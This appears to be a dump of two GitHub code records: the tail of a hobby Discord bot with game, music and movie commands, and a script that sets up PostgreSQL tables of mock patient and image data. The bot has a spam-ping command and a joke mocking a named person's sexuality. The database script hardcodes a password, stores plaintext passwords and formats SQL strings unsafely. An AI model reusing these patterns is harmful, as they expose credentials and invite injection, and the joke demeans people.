Statement\"\n outStr += \"\\n+beanMe: High Quality Beanking(c)\"\n await ctx.send(outStr)\n\n\n@bot.command()\nasync def movieHelp(ctx):\n outStr = \"MOVIE COMMANDS:\"\n outStr += \"\\n+movieLS: Lists currently requested movies\"\n outStr += \"\\n+movieADD(name): Adds a movie to the list\"\n outStr += \"\\n+movieDEL(index): Removes a movie at index from the list\"\n outStr += \"\\n+movieRAND: Picks a movie! ( Don't use this one yet ;) )\"\n await ctx.send(outStr)\n\n\n@bot.command(aliases=['songHelp'])\nasync def musicHelp(ctx):\n outStr = \"MUSIC COMMANDS:\"\n outStr += \"\\n+play(search term / YouTube link): Plays a song or adds it to the queue\"\n outStr += \"\\n+skip: Skips the current song\"\n outStr += \"\\n+queue: Lists the current song queue\"\n await ctx.send(outStr)\n\n\n# FUN CMDS ------------------------------------------------------------------------------ ###\n\n@bot.command()\nasync def arabify(ctx, *args):\n sarcStr = reverseChars(args)\n await ctx.send(sarcStr)\n\n\n@bot.command(aliases=[\"CAT\", \"CATME\", \"catme\", \"cat\"])\nasync def catMe(ctx):\n embed = discord.Embed(\n title='Random Image 🐈',\n description='Random',\n colour=discord.Colour.purple()\n )\n embed.set_image(url='https://source.unsplash.com/1600x900/?cat')\n embed.set_footer(text=\"\")\n await ctx.send(embed=embed)\n\n\n@bot.command(aliases=[\"XKCD\", \"xkcd\", \"xme\", \"XME\", \"XkMe\", \"XKME\"])\nasync def xkme(ctx):\n Feed = feedparser.parse(\"https://xkcd.com/rss.xml\")\n pointer = Feed.entries[0]\n soup = BeautifulSoup(pointer.description, \"html.parser\")\n\n embed = discord.Embed(\n title=\"XKCD \" + pointer.link.split('/')[3] + \" - \" + pointer.title,\n colour=discord.Colour.dark_gray()\n )\n embed.set_image(url=soup.img[\"src\"])\n embed.set_footer(text=soup.img[\"alt\"])\n await ctx.send(embed=embed)\n\n\n@bot.command(aliases=[\"Troll\", \"TROLL\"])\nasync def troll(ctx, user: discord.User):\n if ctx.author.id != ADMINID:\n return\n for i in range(10):\n await asyncio.sleep(1)\n await ctx.send(f\"HEY <@{user.id}>\")\n\n\n@bot.command()\nasync def goom(ctx):\n destStr = random.choice(list(googletrans.LANGCODES.items()))[1]\n result = translator.translate(\"Good Morning\", src=\"en\", dest=destStr)\n await ctx.send(result.text)\n\n\n@bot.command()\nasync def sCasm(ctx, *args):\n sarcStr = sarcasify(args)\n await ctx.send(sarcStr)\n i = beanHandler.account_from_id(ctx.author.id)\n gain = random.randint(5, 20)\n beanHandler.add_beans(gain)\n\n\n@bot.command()\nasync def doomsgay(ctx):\n if ctx.author.id != ADMINID:\n return\n doomTime = datetime.datetime(2025, 9, 9, 0, 0, 0) - datetime.datetime.now()\n outStr = \"Ricky will become homosexual in \"\n years = math.floor(doomTime.days / 365.25)\n days = doomTime.days - math.floor(years * 365.25)\n hours = math.floor(doomTime.seconds / 3600)\n minutes = math.floor(doomTime.seconds / 60) - hours * 60\n outStr += str(years) + \" years, \"\n outStr += str(days) + \" days, \"\n outStr += str(hours) + \" hours, \"\n outStr += str(minutes) + \" minutes\"\n await ctx.send(outStr)\n\n\n@bot.command()\nasync def myIQ(ctx):\n if ctx.author.id == ADMINID:\n # g*mer IQ\n await ctx.send(\"Loochis Daddy's IQ is: 300\")\n else:\n # pleb IQ\n random.seed(ctx.author.id)\n await ctx.send(ctx.author.name + \"'s IQ is: \" + str(random.randint(10, 90)))\n\n\n@bot.command()\nasync def pfpGrabMe(ctx):\n await ctx.send(str(ctx.author.avatar_url))\n\n\n@bot.command()\nasync def pfpGrabYou(ctx, user: discord.User):\n await ctx.send(str(user.avatar_url))\n\n\n@bot.command()\nasync def cringe(ctx):\n await ctx.send(str.upper(random.choice(ctx.guild.members).name) + \" IS CRINGE!\")\n i = beanHandler.account_from_id(ctx.author.id)\n gain = random.randint(5, 20)\n beanHandler.add_beans(gain)\n await ctx.send(\"+\" + str(gain) + \" BND\")\n\n\n@bot.command()\nasync def goodBot(ctx):\n await ctx.send(\"thanks B0s\")\n i = beanHandler.account_from_id(ctx.author.id)\n gain = random.randint(5, 20)\n beanHandler.add_beans(gain)\n await ctx.send(\"+\" + str(gain) + \" BND\")\n\n\n# BEAN CMDS ----------------------------------------------------------------------------- ###\n\n@bot.command()\nasync def beanMe(ctx):\n i = beanHandler.account_from_id(ctx.author.id)\n gain = random.randint(5, 20)\n oldBal = beanHandler.beanAccount.beans\n beanHandler.add_beans(gain)\n if i == 0:\n await ctx.send(ctx.author.name + \"'s Bean Account has been succesfully created!\")\n\n await ctx.send(str.upper(ctx.author.name) + \" GOT BEANED: \\n```\\nOld Balance: \" + numFormat(\n oldBal) + \"Transaction: \" + numFormat(gain) + lineFormat() + \"New Balance: \" + balFormat(beanHandler) + \"```\")\n\n\n@bot.command()\nasync def beanYou(ctx, user: discord.User, *args):\n outAcc = beanHandler.account_from_id(ctx.author.id)\n gain = int(args[0])\n oldBal = beanHandler.beanAccount.beans\n newBal = oldBal - gain\n if outAcc == 0:\n await ctx.send(ctx.author.name + \"'s Bean Account has been succesfully created!\")\n if beanHandler.beanAccount.beans - gain < 0:\n await ctx.send(ctx.author.name + \", You dont have enough BND to perform this Beansaction\")\n return\n beanHandler.add_beans(-gain)\n inAcc = beanHandler.account_from_id(user.id)\n if inAcc == 0:\n await ctx.send(user.name + \"'s Bean Account has been succesfully created!\")\n\n await ctx.send(str.upper(ctx.author.name) + \" BEANED \" + str.upper(user.name) + \"\\n```\\nOld Balance: \" + numFormat(\n oldBal) + \"Transaction: \" + numFormat(-gain) + lineFormat() + \"New Balance: \" + numFormat(newBal) + \"```\")\n oldBal = beanHandler.beanAccount.beans\n beanHandler.add_beans(gain)\n await ctx.send(\n str.upper(user.name) + \" GOT BEANED BY \" + str.upper(ctx.author.name) + \"\\n```\\nOld Balance: \" + numFormat(\n oldBal) + \"Transaction: \" + numFormat(gain) + lineFormat() + \"New Balance: \" + balFormat(\n beanHandler) + \"```\")\n\n\n@bot.command()\nasync def beanCounter(ctx):\n i = beanHandler.account_from_id(ctx.author.id)\n if i == 0:\n await ctx.send(ctx.author.name + \"'s Bean Account has been succesfully created!\")\n\n await ctx.send(ctx.author.name + \"'s Bean Account: \\n```\\nBalance: \" + balFormat(beanHandler) + \"```\")\n\n\n# BUG CMDS ------------------------------------------------------------------------------ ###\n\n@bot.command(aliases=[\"sawbug\", \"SAWBUG\", \"sawbugs\", \"SAWBUGS\", \"sawBugs\"])\nasync def sawBug(ctx, *args):\n gain = 1\n if len(args) != 0 and int(args[0]) > 1:\n gain = int(args[0])\n i = bugHandler.account_from_id(ctx.author.id)\n bugHandler.add_sightings(gain)\n if i == 0:\n await ctx.send(ctx.author.name + \"Saw their first bug!\\nWELCOME TO THE THUNDERDOME\")\n\n if gain == 1:\n await ctx.send(str.upper(ctx.author.name) + \" saw a bug!\")\n else:\n await ctx.send(str.upper(ctx.author.name) + \" saw \" + str(gain) + \" bugs!\")\n\n\n@bot.command(aliases=[\"killedbug\", \"KILLEDBUG\", \"killedbugs\", \"KILLEDBUGS\", \"killedBugs\"])\nasync def killedBug(ctx, *args):\n gain = 1\n if len(args) != 0 and int(args[0]) > 1:\n gain = int(args[0])\n i = bugHandler.account_from_id(ctx.author.id)\n bugHandler.add_kills(gain)\n bugHandler.add_sightings(gain)\n if i == 0:\n await ctx.send(ctx.author.name + \" Killed their first bug!\\nWELCOME TO THE THUNDERDOME\")\n\n if gain == 1:\n await ctx.send(str.upper(ctx.author.name) + \" \" + random.choice(Bugs.KILLED_SYNONYMS) + \" a bug!\")\n else:\n await ctx.send(\n str.upper(ctx.author.name) + \" \" + random.choice(Bugs.KILLED_SYNONYMS) + \" \" + str(gain) + \" bugs!\")\n\n@bot.command(aliases=[\"killedseenbug\", \"KILLEDSEENBUG\"])\nasync def killedSeenBug(ctx):\n bugHandler.account_from_id(ctx.author.id)\n if bugHandler.bugAccount.kills >= bugHandler.bugAccount.sightings:\n await ctx.send(\"Somethin' Ain't right here\")\n return\n bugHandler.add_kills(1)\n\n await ctx.send(\n str.upper(ctx.author.name) + \" \" + random.choice(Bugs.KILLED_SYNONYMS) + \" One that got away!\")\n\n\n@bot.command()\nasync def bugStats(ctx, user: discord.User = None):\n if user is None:\n user = ctx.author\n i = bugHandler.account_from_id(user.id)\n if i == 0:\n await ctx.send(user.name + \" hasn't committed bug crimes yet :(\")\n return\n if bugHandler.bugAccount.kills != 0:\n await ctx.send(ctx.author.name + \"'s Bug crimes: \\n```\\nKills: \" + str(bugHandler.bugAccount.kills) + \"\\nSightings: \"\n + str(bugHandler.bugAccount.sightings) + \"\\nK/S: \"\n + '{0:.3g}'.format(bugHandler.bugAccount.kills / bugHandler.bugAccount.sightings) + \"```\")\n else:\n await ctx.send(\n ctx.author.name + \" is a pacifist :( \\n```\\nKills: \" + str(bugHandler.bugAccount.kills) + \"\\nSightings: \"\n + str(bugHandler.bugAccount.sightings) + \"```\")\n\n\n# MOVIE CMDS ---------------------------------------------------------------------------- ###\n\n@bot.command()\nasync def movieLS(ctx):\n movieHandler = MovieHandler(ctx.guild.id)\n movieHandler.get_movies()\n if len(movieHandler.movies) != 0:\n await ctx.send(\"Here are the curently requested movies:\\n```\" + movieHandler.moviesToOrderedString() + \"\\n```\")\n else:\n await ctx.send(\"There are no requested movies!\")\n\n\n@bot.command()\nasync def movieADD(ctx, *args):\n movieHandler = MovieHandler(ctx.guild.id)\n movieHandler.get_movies()\n name = ' '.join([x for x in args])\n movieHandler.add_movie(name)\n\n await ctx.send(\"Succesfully Added **\" + name + \"**\")\n await ctx.send(\"Here are the curently requested movies:\\n```\" + movieHandler.moviesToOrderedString() + \"\\n```\")\n\n\n@bot.command()\nasync def movieDEL(ctx, *args):\n movieHandler = MovieHandler(ctx.guild.id)\n movieHandler.get_movies()\n try:\n name = movieHandler.del_movie(int(args[0]))\n except:\n await ctx.send(\"Must be a valid index!\")\n return\n\n await ctx.send(\"Succesfully Deleted **\" + name + \"**\")\n if len(movieHandler.movies) != 0:\n await ctx.send(\"Here are the curently requested movies:\\n```\" + movieHandler.moviesToOrderedString() + \"\\n```\")\n else:\n await ctx.send(\"There are no requested movies!\")\n\n\n@bot.command()\nasync def movieRAND(ctx):\n movieHandler = MovieHandler(ctx.guild.id)\n movieHandler.get_movies()\n if len(movieHandler.movies) != 0:\n await ctx.send(\"PICKING FROM A HAT...\")\n await asyncio.sleep(2)\n await ctx.send(\"3...\")\n await asyncio.sleep(2)\n await ctx.send(\"2...\")\n await asyncio.sleep(2)\n await ctx.send(\"1...\")\n await asyncio.sleep(2)\n await ctx.send(\"0.5...\")\n await asyncio.sleep(2)\n await ctx.send(\"0.25...\")\n await asyncio.sleep(2)\n await ctx.send(\"0.125...\")\n await asyncio.sleep(2)\n await ctx.send(\"0.0625...\")\n await asyncio.sleep(2)\n await ctx.send(\"0... FRICK IT ROUNDED DO-\")\n await ctx.send(\"The Chosen Movie is: **\" + random.choice(movieHandler.movies) + \"**\")\n else:\n await ctx.send(\"There are no requested movies!\")\n\n\n# MUSIC CMDS ---------------------------------------------------------------------------- ###\n\n@bot.command(aliases=['p', 'P', 'Play', 'PLAY'])\nasync def play(ctx, *args):\n video = Music.getVideo(args)\n if video is None:\n await ctx.send(\"ERR: Cannot find song.\")\n return\n\n guildID = ctx.guild.id\n if str(guildID) not in musicDict:\n musicDict[str(guildID)] = []\n\n if ctx.author.voice is None:\n await ctx.send(\"ERR: User not in channel.\")\n return\n\n voice_channel = ctx.author.voice.channel\n\n bot_channel = None\n if not (ctx.guild.voice_client is None):\n bot_channel = ctx.guild.voice_client.channel\n\n if bot_channel is not None:\n if voice_channel == bot_channel:\n vc = ctx.guild.voice_client\n else:\n await ctx.send(\"ERR: Bot is in another channel, permission denied.\")\n return\n else:\n await ctx.send(\"Joined VC\")\n vc = await voice_channel.connect()\n\n print(video)\n if len(video) == 1:\n musicDict[str(guildID)].append(video[0])\n if vc.is_playing():\n await ctx.send(\"Queued: **\" + video[0].title + \"**\")\n else:\n for v in video:\n musicDict[str(guildID)].append(v)\n await ctx.send(\"Queued \" + str(len(video)) + \" videos\")\n\n print(len(musicDict[str(guildID)]))\n if not vc.is_playing():\n await playNext(ctx)\n\n\n@bot.command(aliases=['s', 'S', 'Skip', 'SKIP'])\nasync def skip(ctx):\n if ctx.author.voice is None:\n await ctx.send(\"ERR: User not in channel.\")\n return\n\n voice_channel = ctx.author.voice.channel\n bot_channel = None\n if not (ctx.guild.voice_client is None):\n bot_channel = ctx.guild.voice_client.channel\n\n if bot_channel is not None:\n if voice_channel == bot_channel:\n vc = ctx.guild.voice_client\n else:\n await ctx.send(\"ERR: Bot is in another channel, permission denied.\")\n return\n else:\n await ctx.send(\"ERR: Bot not in channel.\")\n return\n\n guildID = ctx.guild.id\n if not musicDict[str(guildID)]:\n await ctx.send(\"Nothing in Queue!\")\n return\n\n try:\n # del musicDict[str(guildID)][0]\n voice_channel = ctx.message.guild.voice_client\n voice_channel.stop()\n await ctx.send(\"Skipped!\")\n except:\n await ctx.send(\"ERR: Nothing playing.\")\n return\n\n # await playNext(ctx)\n\n\nasync def playNext(ctx):\n guildID = ctx.guild.id\n if len(musicDict[str(guildID)]) >= 1:\n await ctx.send(\"Now Playing: **\" + musicDict[str(guildID)][0].title + \"**\")\n if len(musicDict[str(guildID)]) == 0:\n return\n vc = ctx.guild.voice_client\n Music.getYTFile(musicDict[str(guildID)][0], ctx.guild.id)\n vc.play(discord.FFmpegPCMAudio(source=\"Audio/\" + str(ctx.guild.id) + \".mp4\"))\n while vc.is_playing():\n await asyncio.sleep(1)\n del musicDict[str(guildID)][0]\n print(\"Deleted.\")\n await playNext(ctx)\n else:\n await ctx.send(\"Queue Finished!\")\n\n\n@bot.command(aliases=['q', 'Q', 'Queue'])\nasync def queue(ctx, *args):\n guildID = ctx.guild.id\n if str(guildID) not in musicDict:\n musicDict[str(guildID)] = []\n if not musicDict[str(guildID)]:\n await ctx.send(\"Nothing in Queue!\")\n return\n\n pageNum = 1\n if args:\n try:\n pageNum = int(args[0])\n except:\n await ctx.send(\"Invalid Page Number\")\n\n outStr = pageListFormatter([x.title for x in musicDict[str(guildID)]], pageNum)\n\n await ctx.send(outStr)\n\n\n# BEAT SABER REQUEST FUNCS -------------------------------------------------------------- ###\n\n@bot.command(aliases=[\"BS\", \"beatsaber\", \"BEATSABER\", \"bs\", \"bsrequest\", \"BEATSABERREQUEST\"])\nasync def BeatSaber(ctx, *args):\n msg = await ctx.send(\"Searching...\")\n url = reqManager.getBeatsaverPage(' '.join(args))\n if url[0:8] == \"https://\":\n await msg.edit(content=\"Verifying...\")\n bsSong = BeatRequests.BSSong(url)\n reqStatus = reqManager.add_req(bsSong)\n if not reqStatus:\n await msg.edit(content=\"Song already in queue!\")\n return\n\n embed = discord.Embed(\n title=\"[{}] \".format(bsSong.id) + bsSong.name,\n description=\"Mapped By: {}\".format(bsSong.mapper),\n colour=discord.Colour.red()\n )\n embed.set_image(url=bsSong.coverArt)\n embed.set_footer(text=bsSong.description)\n embed.add_field(name=\"Votes\", value=\"\\👍 \" + str(bsSong.upvotes) + \" | \\👎\" + str(bsSong.downvotes),\n inline=False)\n await msg.edit(content=\"Successfully added!\", embed=embed)\n else:\n await msg.edit(content=url)\n\n\n@bot.command(aliases=[\"BSLS\", \"beatsaberlist\", \"BEATSABERLIST\", \"bsls\", \"bslist\"])\nasync def BeatSaberList(ctx, *args):\n pageNum = 1\n if args:\n try:\n pageNum = int(args[0])\n except:\n await ctx.send(\"Invalid Page Number\")\n\n reqManager.get_reqs()\n if not reqManager.requests:\n await ctx.send(\"Nothing in Queue!\")\n return\n\n print([x.split(\"\u001f\")[1] for x in reqManager.requests])\n outStr = pageListFormatter([x.split(\"\u001f\")[1] for x in reqManager.requests], pageNum)\n await ctx.send(outStr)\n\n\n# HELPER FUNCS -------------------------------------------------------------------------- ###\n\ndef pageListFormatter(pagedList, pageNum):\n maxPageNum = math.floor(len(pagedList) / 10.0) + 1\n if pageNum < 1:\n pageNum = 1\n if pageNum > maxPageNum:\n pageNum = maxPageNum\n\n outStr = \"Queue Page \" + str(pageNum) + \"/\" + str(maxPageNum) + \":\\n```\"\n outStr += \"\\n>> \" + pagedList[0]\n for i in range((pageNum - 1) * 10, min(pageNum * 10, len(pagedList))):\n outStr += \"\\n(\" + str(i + 1) + \"). \" + pagedList[i]\n outStr += \"```\"\n return outStr\n\n\ndef sarcasify(*args):\n random.seed(time.time())\n outStr = '\"'\n for arg in args:\n for argSt in arg:\n for argCh in argSt:\n outStr += random.choice([str.lower(argCh), str.upper(argCh)])\n outStr += \" \"\n outStr += '\"'\n return outStr\n\n\ndef reverseChars(*args):\n outStr = u'\\u202B'\n for arg in args:\n for argSt in arg:\n for argCh in argSt:\n outStr += argCh\n outStr += \" \"\n outStr += u'\\u202B'\n return outStr[::-1]\n\n\ndef balFormat(bHandler):\n return str(bHandler.beanAccount.beans) + \" BND\\n\"\n\n\ndef numFormat(num):\n return str(num) + \" BND\\n\"\n\n\ndef lineFormat():\n return \"-----------------------\\n\"\n\n\nbot.run(TOKEN)\n", "repo_name": "Loochis/LoochisBot", "sub_path": "LoochisBot.py", "file_name": "LoochisBot.py", "file_ext": "py", "file_size_in_byte": 19816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 32, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 34, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 36, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 39, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 39, "usage_type": "name"}, {"api_name": "Beans.BeanHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "Bugs.BugHandler", "line_number": 43, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 44, "usage_type": "call"}, {"api_name": "BeatRequests.BSReqHandler", "line_number": 45, "usage_type": "call"}, {"api_name": "googletrans.Translator", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 116, "usage_type": "call"}, {"api_name": "discord.Colour.purple", "line_number": 119, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 119, "usage_type": "attribute"}, {"api_name": "feedparser.parse", "line_number": 128, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 130, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 132, "usage_type": "call"}, {"api_name": "discord.Colour.dark_gray", "line_number": 134, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 134, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 142, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 152, "usage_type": "call"}, {"api_name": "googletrans.LANGCODES.items", "line_number": 152, "usage_type": "call"}, {"api_name": "googletrans.LANGCODES", "line_number": 152, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 162, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 170, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 172, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 173, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 174, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 175, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 190, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 191, "usage_type": "call"}, {"api_name": "discord.User", "line_number": 200, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 208, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 217, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 227, "usage_type": "call"}, {"api_name": "discord.User", "line_number": 238, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 302, "usage_type": "call"}, {"api_name": "Bugs.KILLED_SYNONYMS", "line_number": 302, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 305, "usage_type": "call"}, {"api_name": "Bugs.KILLED_SYNONYMS", "line_number": 305, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 316, "usage_type": "call"}, {"api_name": "Bugs.KILLED_SYNONYMS", "line_number": 316, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 320, "usage_type": "attribute"}, {"api_name": "Movies.MovieHandler", "line_number": 341, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 351, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 362, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 379, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 383, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 385, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 387, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 389, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 391, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 393, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 395, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 397, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 399, "usage_type": "call"}, {"api_name": "Music.getVideo", "line_number": 408, "usage_type": "call"}, {"api_name": "Music.getYTFile", "line_number": 497, "usage_type": "call"}, {"api_name": "discord.FFmpegPCMAudio", "line_number": 498, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 500, "usage_type": "call"}, {"api_name": "BeatRequests.BSSong", "line_number": 537, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 543, "usage_type": "call"}, {"api_name": "discord.Colour.red", "line_number": 546, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 546, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 579, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 594, "usage_type": "call"}, {"api_name": "time.time", "line_number": 594, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 599, "usage_type": "call"}]}
+{"seq_id": "13417053638", "text": "import psycopg2\r\n\r\n# PQSL Database Information\r\n#DATABASE = \"test_db\"\r\n#USER = \"postgres\"\r\n#PASSWORD = \"amilucy.2152ami\"\r\n#HOST = \"127.0.0.1\"\r\n#PORT = \"5432\"\r\n\r\nimport psycopg2\r\nimport os\r\nimport pandas as pd\r\n\r\nDATABASE = \"mdph612yz2\"\r\nUSER = \"postgres\"\r\nPASSWORD = \"amilucy.2152ami\"\r\nHOST = \"127.0.0.1\"\r\nPORT = \"5432\"\r\n\r\n\"\"\"\r\nThis script builds all required database and populates them with mock data\r\n\"\"\"\r\n\r\n# create PATIENT_INFO database\r\ncon = psycopg2.connect(database=DATABASE, user=USER, password=PASSWORD,\r\n host=HOST, port=PORT)\r\nprint(\"Database opened successfully\")\r\n\r\n\r\n################ CREATE DATABASES ################\r\n\r\n\r\n# Create patient database containing name and password\r\ndef create_patient_database(cur):\r\n cur.execute(\"DROP TABLE IF EXISTS PATIENT CASCADE\")\r\n # create a table called PATIENT\r\n cur.execute('''CREATE TABLE PATIENT (\r\n PATIENTID INT PRIMARY KEY NOT NULL,\r\n NAME TEXT NOT NULL,\r\n PASSWORD TEXT NOT NULL);''')\r\n \r\n\r\n# Create image database containing image name and path\r\ndef create_image_database(cur):\r\n cur.execute(\"DROP TABLE IF EXISTS IMAGE CASCADE\")\r\n cur.execute('''CREATE TABLE IMAGE (\r\n IMAGEID INT PRIMARY KEY NOT NULL,\r\n NAME TEXT NOT NULL,\r\n FULLPATH TEXT NOT NULL);''')\r\n\r\n# Create patient-image database linking images to patients\r\ndef create_patientimage_database(cur):\r\n cur.execute(\"DROP TABLE IF EXISTS PATIENT_IMAGE CASCADE\")\r\n cur.execute('''CREATE TABLE PATIENT_IMAGE (\r\n PATIENTID INTEGER NOT NULL,\r\n IMAGEID INTEGER NOT NULL,\r\n PRIMARY KEY (PATIENTID , IMAGEID),\r\n FOREIGN KEY (PATIENTID)\r\n REFERENCES PATIENT (PATIENTID)\r\n ON UPDATE CASCADE ON DELETE CASCADE,\r\n FOREIGN KEY (IMAGEID)\r\n REFERENCES IMAGE (IMAGEID)\r\n ON UPDATE CASCADE ON DELETE CASCADE\r\n )\r\n ''')\r\n\r\n\r\n \r\n################ INSERT DATABASES ################\r\n\r\ndef insert_to_database(cur):\r\n # Patient information\r\n\r\n \r\n Patient_list = [\r\n [1, 'Yujing Jackson', 'Shirin'],\r\n [2, 'Marco DiFreddie', 'Piotr'],\r\n [3, 'Hossein Queen', 'Jan'],\r\n [4, 'Alexandru Mercury', 'Horacio']\r\n \r\n ] \r\n\r\n # Image information\r\n Image_list = [\r\n [1, 'originalhisto','p1\\A21.png'],\r\n [2, 'segmentation','p1\\A21-annotation.png'],\r\n [3, 'histogram', 'p1\\histogram1.png'],\r\n [4,'dicomslice','p1\\dicom_png_test_001.png'],\r\n [5,'GTmask','p1\\mask_png_test_001.png'],\r\n [6,'PREDmask','p1\\pred_mask_test_001.png'],\r\n [7, 'originalhisto','p2\\A42.png'],\r\n [8, 'segmentation','p2\\A42-annotation.png'],\r\n [9, 'histogram', 'p2\\histogram1.png'],\r\n [10,'dicomslice','p2\\dicom_png_test_002.png'],\r\n [11,'GTmask','p2\\mask_png_test_002.png'],\r\n [12,'PREDmask','p2\\pred_mask_test_002.png'],\r\n [13, 'originalhisto','p3\\A51.png'],\r\n [14, 'segmentation','p3\\A51-annotation.png'],\r\n [15, 'histogram', 'p3\\histogram1.png'],\r\n [16,'dicomslice','p3\\dicom_png_test_003.png'],\r\n [17,'GTmask','p3\\mask_png_test_003.png'],\r\n [18,'PREDmask','p3\\pred_mask_test_003.png'],\r\n [19, 'originalhisto','p4\\A52.png'],\r\n [20, 'segmentation','p4\\A52-annotation.png'],\r\n [21, 'histogram', 'p4\\histogram1.png'],\r\n [22,'dicomslice','p4\\dicom_png_test_004.png'],\r\n [23,'GTmask','p4\\mask_png_test_004.png'],\r\n [24,'PREDmask','p4\\pred_mask_test_004.png'],\r\n ]\r\n \r\n # Patient-Image link: the first 3 images for each patient are histology-related, the latter 3 are dicom-related\r\n patient_image = [\r\n [1,1],\r\n [1,2],\r\n [1,3],\r\n [1,4],\r\n [1,5],\r\n [1,6],\r\n \r\n [2,7],\r\n [2,8],\r\n [2,9],\r\n [2,10],\r\n [2,11],\r\n [2,12],\r\n \r\n [3,13],\r\n [3,14],\r\n [3,15],\r\n [3,16],\r\n [3,17],\r\n [3,18],\r\n \r\n [4,19],\r\n [4,20],\r\n [4,21],\r\n [4,22],\r\n [4,23],\r\n [4,24],\r\n ]\r\n############ inserting data into created table ##########\r\n try:\r\n \r\n for row in Patient_list:\r\n cur.execute(\"INSERT INTO PATIENT (PATIENTID,NAME,PASSWORD) \\\r\n VALUES (%i, '%s', '%s')\"%(row[0],row[1],row[2]))\r\n except Exception as e:\r\n print (e)\r\n \r\n try:\r\n for row in Image_list:\r\n cur.execute(\"INSERT INTO IMAGE (IMAGEID,NAME,FULLPATH) \\\r\n VALUES (%i, '%s', '%s')\"%(row[0],row[1],row[2]))\r\n\r\n except Exception as e:\r\n print (e)\r\n \r\n try:\r\n for row in patient_image:\r\n cur.execute(\"INSERT INTO PATIENT_IMAGE (PATIENTID,IMAGEID) \\\r\n VALUES (%i, %i)\"%(row[0],row[1]))\r\n except Exception as e:\r\n print (e)\r\n\r\n\r\n \r\n ############### Querying data from database#######\r\n ################ DISPLAY DATABASES ################\r\ndef read_db(cur, table):\r\n cur.execute('SELECT * FROM %s'%table)\r\n rows = cur.fetchall()\r\n for row in rows:\r\n print (row)\r\n\r\ndef main():\r\n # Open Database\r\n con = psycopg2.connect(database=DATABASE, user=USER, password=PASSWORD, host=HOST, port=PORT)\r\n print(\"Database opened successfully\")\r\n cur = con.cursor()\r\n\r\n # Create Database Tables\r\n create_patient_database(cur)\r\n create_image_database(cur)\r\n create_patientimage_database(cur)\r\n # create_organ_database(cur)\r\n # create_patientorgan_database(cur)\r\n\r\n # Insert data to tables\r\n insert_to_database(cur)\r\n con.commit()\r\n print(\"data inserted to database successfully\")\r\n\r\n # Print Database Content\r\n #read_db(cur,'PATIENT')\r\n #read_db(cur, 'IMAGE')\r\n #read_db(cur, 'PATIENT_IMAGE')\r\n #read_db(cur, 'ORGAN')\r\n #read_db(cur, 'PATIENT_ORGAN')\r\n\r\nif __name__ == \"__main__\":\r\n main()", "repo_name": "yujing1997/mdph612-webapp-histo", "sub_path": "db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 6299, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "psycopg2.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 177, "usage_type": "call"}]}
